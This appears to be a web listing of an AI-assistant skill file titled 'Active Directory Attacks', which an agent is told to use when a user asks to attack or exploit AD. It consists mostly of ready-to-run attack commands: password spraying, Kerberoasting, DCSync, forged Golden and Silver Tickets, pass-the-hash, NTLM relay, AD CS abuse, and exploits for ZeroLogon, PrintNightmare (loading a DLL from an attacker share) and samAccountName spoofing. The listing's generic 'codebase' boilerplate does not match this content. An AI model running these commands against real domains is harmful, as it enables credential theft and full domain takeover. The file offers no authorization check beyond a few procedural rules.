active-directory-attacks by zebbern
This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing.
Security
3.0K Stars
263 Forks
Updated Jan 12, 2026, 12:44 AM
Why Use This
This skill provides specialized capabilities for zebbern's codebase.
Use Cases
- Developing new features in the zebbern repository
- Refactoring existing code to follow zebbern standards
- Understanding and working with zebbern's codebase structure
Skill Snapshot
Auto scan of skill assets. Informational only.
Valid SKILL.md
Checks against SKILL.md specification
Source & Community
Repository claude-code-guide
Skill Version
main
Community
3.0K 263
Updated At Jan 12, 2026, 12:44 AM
Skill Stats
SKILL.md 381 Lines
Total Files 1
Total Size 0 B
License NOASSERTION
--- name: Active Directory Attacks description: This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing. --- # Active Directory Attacks ## Purpose Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing. ## Inputs/Prerequisites - Kali Linux or Windows attack platform - Domain user credentials (for most attacks) - Network access to Domain Controller - Tools: Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec ## Outputs/Deliverables - Domain enumeration data - Extracted credentials and hashes - Kerberos tickets for impersonation - Domain Administrator access - Persistent access mechanisms --- ## Essential Tools | Tool | Purpose | |------|---------| | BloodHound | AD attack path visualization | | Impacket | Python AD attack tools | | Mimikatz | Credential extraction | | Rubeus | Kerberos attacks | | CrackMapExec | Network exploitation | | PowerView | AD enumeration | | Responder | LLMNR/NBT-NS poisoning | --- ## Core Workflow ### Step 1: Kerberos Clock Sync Kerberos requires clock synchronization (±5 minutes): ```bash # Detect clock skew nmap -sT 10.10.10.10 -p445 --script smb2-time # Fix clock on Linux sudo date -s "14 APR 2024 18:25:16" # Fix clock on Windows net time /domain /set # Fake clock without changing system time faketime -f '+8h' <command> ``` ### Step 2: AD Reconnaissance with BloodHound ```bash # Start BloodHound neo4j console bloodhound --no-sandbox # Collect data with SharpHound .\SharpHound.exe -c All .\SharpHound.exe -c All --ldapusername user --ldappassword pass # Python collector (from Linux) bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all ``` ### Step 3: PowerView Enumeration ```powershell # Get domain info Get-NetDomain Get-DomainSID Get-NetDomainController # Enumerate users Get-NetUser Get-NetUser -SamAccountName targetuser Get-UserProperty -Properties pwdlastset # Enumerate groups Get-NetGroupMember -GroupName "Domain Admins" Get-DomainGroup -Identity "Domain Admins" | Select-Object -ExpandProperty Member # Find local admin access Find-LocalAdminAccess -Verbose # User hunting Invoke-UserHunter Invoke-UserHunter -Stealth ``` --- ## Credential Attacks ### Password Spraying ```bash # Using kerbrute ./kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123 # Using CrackMapExec crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success ``` ### Kerberoasting Extract service account TGS tickets and crack offline: ```bash # Impacket GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt # Rubeus .\Rubeus.exe kerberoast /outfile:hashes.txt # CrackMapExec crackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt # Crack with hashcat hashcat -m 13100 hashes.txt rockyou.txt ``` ### AS-REP Roasting Target accounts with "Do not require Kerberos preauthentication": ```bash # Impacket GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat # Rubeus .\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt # Crack with hashcat hashcat -m 18200 hashes.txt rockyou.txt ``` ### DCSync Attack Extract credentials directly from DC (requires Replicating Directory Changes rights): ```bash # Impacket secretsdump.py domain.local/admin:password@10.10.10.10 -just-dc-user krbtgt # Mimikatz lsadump::dcsync /domain:domain.local /user:krbtgt lsadump::dcsync /domain:domain.local /user:Administrator ``` --- ## Kerberos Ticket Attacks ### Pass-the-Ticket (Golden Ticket) Forge TGT with krbtgt hash for any user: ```powershell # Get krbtgt hash via DCSync first # Mimikatz - Create Golden Ticket kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt # Impacket ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator export KRB5CCNAME=Administrator.ccache psexec.py -k -no-pass domain.local/Administrator@dc.domain.local ``` ### Silver Ticket Forge TGS for specific service: ```powershell # Mimikatz kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:SERVICE_HASH /ptt ``` ### Pass-the-Hash ```bash # Impacket psexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH wmiexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH smbexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH # CrackMapExec crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth ``` ### OverPass-the-Hash Convert NTLM hash to Kerberos ticket: ```bash # Impacket getTGT.py domain.local/user -hashes :NTHASH export KRB5CCNAME=user.ccache # Rubeus .\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt ``` --- ## NTLM Relay Attacks ### Responder + ntlmrelayx ```bash # Start Responder (disable SMB/HTTP for relay) responder -I eth0 -wrf # Start relay ntlmrelayx.py -tf targets.txt -smb2support # LDAP relay for delegation attack ntlmrelayx.py -t ldaps://dc.domain.local -wh attacker-wpad --delegate-access ``` ### SMB Signing Check ```bash crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt ``` --- ## Certificate Services Attacks (AD CS) ### ESC1 - Misconfigured Templates ```bash # Find vulnerable templates certipy find -u user@domain.local -p password -dc-ip 10.10.10.10 # Exploit ESC1 certipy req -u user@domain.local -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn administrator@domain.local # Authenticate with certificate certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10 ``` ### ESC8 - Web Enrollment Relay ```bash ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController ``` --- ## Critical CVEs ### ZeroLogon (CVE-2020-1472) ```bash # Check vulnerability crackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon # Exploit python3 cve-2020-1472-exploit.py DC01 10.10.10.10 # Extract hashes secretsdump.py -just-dc domain.local/DC01\$@10.10.10.10 -no-pass # Restore password (important!) python3 restorepassword.py domain.local/DC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD ``` ### PrintNightmare (CVE-2021-1675) ```bash # Check for vulnerability rpcdump.py @10.10.10.10 | grep 'MS-RPRN' # Exploit (requires hosting malicious DLL) python3 CVE-2021-1675.py domain.local/user:pass@10.10.10.10 '\\attacker\share\evil.dll' ``` ### samAccountName Spoofing (CVE-2021-42278/42287) ```bash # Automated exploitation python3 sam_the_admin.py "domain.local/user:password" -dc-ip 10.10.10.10 -shell ``` --- ## Quick Reference | Attack | Tool | Command | |--------|------|---------| | Kerberoast | Impacket | `GetUserSPNs.py domain/user:pass -request` | | AS-REP Roast | Impacket | `GetNPUsers.py domain/ -usersfile users.txt` | | DCSync | secretsdump | `secretsdump.py domain/admin:pass@DC` | | Pass-the-Hash | psexec | `psexec.py domain/user@target -hashes :HASH` | | Golden Ticket | Mimikatz | `kerberos::golden /user:Admin /krbtgt:HASH` | | Spray | kerbrute | `kerbrute passwordspray -d domain users.txt Pass` | --- ## Constraints **Must:** - Synchronize time with DC before Kerberos attacks - Have valid domain credentials for most attacks - Document all compromised accounts **Must Not:** - Lock out accounts with excessive password spraying - Modify production AD objects without approval - Leave Golden Tickets without documentation **Should:** - Run BloodHound for attack path discovery - Check for SMB signing before relay attacks - Verify patch levels for CVE exploitation --- ## Examples ### Example 1: Domain Compromise via Kerberoasting ```bash # 1. Find service accounts with SPNs GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 # 2. Request TGS tickets GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 -request -outputfile tgs.txt # 3. Crack tickets hashcat -m 13100 tgs.txt rockyou.txt # 4. Use cracked service account psexec.py domain.local/svc_admin:CrackedPassword@10.10.10.10 ``` ### Example 2: NTLM Relay to LDAP ```bash # 1. Start relay targeting LDAP ntlmrelayx.py -t ldaps://dc.domain.local --delegate-access # 2. Trigger authentication (e.g., via PrinterBug) python3 printerbug.py domain.local/user:pass@target 10.10.10.12 # 3. Use created machine account for RBCD attack ``` --- ## Troubleshooting | Issue | Solution | |-------|----------| | Clock skew too great | Sync time with DC or use faketime | | Kerberoasting returns empty | No service accounts with SPNs | | DCSync access denied | Need Replicating Directory Changes rights | | NTLM relay fails | Check SMB signing, try LDAP target | | BloodHound empty | Verify collector ran with correct creds | --- ## Additional Resources For advanced techniques including delegation attacks, GPO abuse, RODC attacks, SCCM/WSUS deployment, ADCS exploitation, trust relationships, and Linux AD integration, see [references/advanced-attacks.md](references/advanced-attacks.md).
Name Size